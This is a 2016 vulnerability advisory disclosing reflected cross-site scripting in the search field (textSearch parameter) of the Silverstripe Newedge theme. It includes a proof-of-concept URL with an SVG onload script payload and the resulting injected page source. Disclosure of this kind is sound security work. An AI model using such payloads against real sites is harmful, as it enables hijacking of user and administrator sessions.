Silverstripe Theme Newedge Cross Site Scripting
Posted on 22 September 2016
i>>?[+] Document Title: Silverstripe Theme Newedge - Cross Site Web Vulnerability [+] Release Date: 2016-09-21 [+] Vendor : https://www.newedge.co.uk/ [+] Exploitation Technique: Remote [+] Severity Level: Medium [+] Tested Os : Windows 10 Release Date: ============= 2016-09-20 Vulnerability Disclosure Timeline: ================================== 2016-09-22 : Public Disclosure Technical Details & Description: ================================ A client-side cross site scripting web vulnerability has been discovered in the official Theme Newedge for Silverstripe content management system. The vulnerability allows remote attacker to inject own malicious script codes on the client-side of the vulnerable module or service. A client-side cross site scripting web vulnerability is located in the search engine. The web vulnerability could allow an attacker to execute javascript in the web-browser of the user or administrator to compromise session credentials. and so hijacked the identification. Request Method(s): [+] Get Vulnerable Module(s): [+] search (Input) Vulnerable Parameter(s): [+] textSearch Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privileged user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Request Method Get [+] http://localhost:8000/search/searchresults?textSearch=" ><svg/onload=alert(/VulnerabilityLab/)>&RegionSelect=9&CountrySelect=12&Resort Select=ALL&BoardBasis=all&tags[]=3 --- PoC: Source --- <div class="luxury_form"> <form action="search/searchresults"> <div class="form_block"> <input id="textSearch" name="textSearch" onkeyup="searchAjax()" type="text" class="luxury_field" value="" ><svg/onload=alert(/VulnerabilityLab/)>" onBlur="if(value==''){value='Hotel name'}" onFocus="if(value=='Hotel name'){value=''}"> </div> </form> </div> [+] Disclaimer [+] =================== Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. Domain: www.zwx.fr Contact: msk4@live.fr Social: twitter.com/XSSed.fr Feeds: www.zwx.fr/feed/ Advisory: www.vulnerability-lab.com/show.php?user=ZwX packetstormsecurity.com/files/author/12026/ 0day.today/author/27461 Copyright A(c) 2016 | ZwX - Security Researcher (Software & web application)